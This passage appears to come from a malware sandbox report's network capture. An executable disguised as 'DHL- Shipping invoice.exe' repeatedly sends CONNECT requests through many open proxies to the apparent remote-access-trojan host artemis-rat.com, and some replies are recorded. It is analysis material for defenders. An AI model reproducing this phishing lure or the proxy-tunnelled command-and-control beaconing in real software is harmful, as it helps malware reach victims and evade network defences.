54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1671192.168.2.45025341.223.232.11731286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.364101887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1672192.168.2.454887212.127.93.18580816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.364270926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1673192.168.2.45479061.133.66.6990026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.364322901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.712389946 CET311INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1674192.168.2.454278161.97.163.5290456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.364478111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.008830070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.641319990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.941689014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.453330040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.953439951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.453327894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.453746080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:31.452898026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1675192.168.2.45323292.204.135.203347806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.364489079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1676192.168.2.454281213.184.153.6680806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.366693974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1677192.168.2.45020862.109.0.18241016484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.366770983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.453061104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.455219984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.500597000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.597244978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:42.640516996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:54.640477896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:18.656327963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1678192.168.2.45483849.4.48.12888886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.366822958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.672188997 CET179INHTTP/1.1 504 Gateway Time-out
                            Server: nginx/1.20.1
                            Date: Tue, 12 Mar 2024 07:37:16 GMT
                            Content-Type: text/html
                            Content-Length: 494
                            Connection: close
                            ETag: "658e91eb-1ee"


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1679192.168.2.45322592.204.134.38430446484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.369370937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1680192.168.2.45492245.87.43.152806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.370048046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1681192.168.2.454215203.96.177.211121836484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.372934103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.562340021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1682192.168.2.45489431.43.33.5641536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.372940063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1683192.168.2.454899149.62.244.2741536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.373049974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1684192.168.2.453908103.97.179.11510806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.375035048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1685192.168.2.454765222.220.102.15980006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.375622988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1686192.168.2.45498923.137.248.19788886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.376874924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.536238909 CET309INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1687192.168.2.45491484.47.145.18980806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.384896994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.132157087 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1688192.168.2.454822139.59.1.1480806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.397165060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.746623039 CET28INHTTP/1.1 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1689192.168.2.455005188.166.17.1888816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.400264025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1690192.168.2.454863121.182.138.71806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.406658888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1691192.168.2.455109195.201.19.844436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.418956041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1692192.168.2.455111195.201.19.844436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.419899940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1693192.168.2.455114195.201.19.844436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.420803070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1694192.168.2.455116195.201.19.844436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.421648026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1695192.168.2.453220162.240.22.184434946484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.428035021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.562577963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.563055038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.562551022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1696192.168.2.45440069.61.200.104361816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.428128004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1697192.168.2.454893170.84.205.1741536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.431447029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1698192.168.2.453169167.86.69.142363946484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.431684017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.008713007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.641031981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1699192.168.2.454883125.228.143.20741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.431783915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1700192.168.2.455135137.184.142.374436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.433167934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1701192.168.2.454194171.244.140.160537496484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.433240891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.562575102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1702192.168.2.455137137.184.142.374436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.433696032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1703192.168.2.455138137.184.142.374436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.434830904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1704192.168.2.455140137.184.142.374436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
